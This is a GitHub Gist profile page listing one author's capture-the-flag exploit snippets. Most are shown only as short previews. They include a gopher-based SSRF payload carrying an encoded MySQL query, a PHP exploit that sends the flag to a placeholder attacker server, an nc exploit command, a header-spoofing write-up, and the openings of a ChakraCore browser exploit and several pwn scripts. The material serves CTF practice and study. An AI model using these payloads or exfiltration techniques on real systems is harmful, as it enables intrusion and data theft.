Skip to content

Instantly share code, notes, and snippets.

View eboda's full-sized avatar

Edgar Boda-Majer eboda

114 followers · 3 following
View GitHub Profile
@eboda
eboda / doit
Last active June 13, 2018 06:10
34C3 CTF minbashmaxfun exploit
nc minbashmaxfun 1337 -v <<<$(python solve.py file dump_flag.sh )
@eboda
eboda / foo
Created December 29, 2017 20:07
34C3 CTF extract0r solution
gopher://foo@[cafebabe.cf]@yolo.com:3306/A%48%00%00%01%85%a6%3f%20%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%6d%34%73%74%33%72%5f%6f%76%33%72%6c%30%72%64%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%00%4c%01%00%00%03%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%63%61%73%74%28%30%78%35%30%34%62%30%33%30%34%30%61%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%36%34%30%30%30%30%30%30%36%34%30%30%30%30%30%30%30%61%30%30%30%30%30%30%36%37%36%39%36%64%36%64%36%35%35%66%36%36%36%63%36%31%36%37%20%61%73%20%62%69%6e%61%72%79%29%2c%20%72%70%61%64%28%66%6c%61%67%2c%20%31%30%30%2c%20%27%41%27%29%2c%20%63%61%73%74%28%30%78%35%30%34%62%30%31%30%32%31%65%30%33%30%61%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%36%34%30%30%30%30%30%30%36%34%30%30%30%30%30%30%30%61%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%36%37%36%39%36%64%36%64%36%35%35%
@eboda
eboda / exploit.php
Last active December 29, 2017 22:52
34C3 CTF urlstorage exploit
<?php
$target = 'http://127.0.0.1/';
$exploit = 'http://yourserver:1337/exploit.php';
$exfil = 'http://yourserver:1337/FLAG=';
function enc($s) {
$res = '';
for ($i = 0; $i < strlen($s); $i++) {
$res .= '\\' . dechex(ord($s[$i]));
}
@eboda
eboda / sha2017.md
Created June 11, 2017 08:19
SHA2017 web100 writeup

SHA2017 web100

Web100 asked us to connect to the website from 12 different IPs from different countries. Instead of using proxies, you could simply set the X-Forwarded-For header to an IP from the required country. A list of country to IP mappings can be found at http://www.nirsoft.net/countryip/nl.html. After doinng it 12 times, it would return the flag

@eboda
eboda / pwn.py
Last active June 11, 2017 08:15
SHA2017 crypto writeup
import requests
from PIL import Image
from StringIO import StringIO
def get_flag_rgb():
rgb = []
flag = requests.get("https://cryptoengine.stillhackinganyway.nl/flag").content
for i in range(20, 480, 40):
rgb.append(pixel(flag, i))
@eboda
eboda / exploit.js
Last active September 14, 2021 13:20
Exploit for Chakrazy challenge from PlaidCTF 2017 - ChakraCore exploit
////////////////////////////////////////////////////////////////////////////
//
// The vulnerability was that the following line of code could change the type of the
// underlying Array from JavascriptNativeIntArray to JavascriptArray:
//
// spreadableCheckedAndTrue = JavascriptOperators::IsConcatSpreadable(aItem) != FALSE;
//
// As can be seen in the provided .diff, the check for whether the type of the pDestArray has changed
// was removed. If the aItem then is not a JavascriptArray, the following code path is taken:
// else
@eboda
eboda / go.py
Created December 29, 2016 22:10
hohoho solution
import sys
m = {
'0' : '$[$?/$$]',
'1' : '$?',
'2' : '$[$?+$?]',
'3' : '$[$?+$?+$?]',
'4' : '$[$?+$?+$?+$?]',
'5' : '$[$?+$?+$?+$?+$?]',
'6' : '$[($?+$?+$?)*($?+$?)]',
@eboda
eboda / ropbaby.py
Last active August 29, 2015 14:21
#!/usr/bin/env python
import sys
import socket
import struct
import telnetlib
import time
import re
import string
@eboda
eboda / template.py
Created May 7, 2015 13:10
pwn template
#!/usr/bin/env python
import sys
import socket
import struct
import telnetlib
import time
import re
import string
@eboda
eboda / exploit.py
Created March 17, 2015 11:55
codegate ctf BOOKSTORE exploit
#!/usr/bin/env python
#coding: UTF-8
import struct
import socket
import telnetlib
import sys
if len(sys.argv) > 1 and sys.argv[1] == "l":
print "=== local exploit"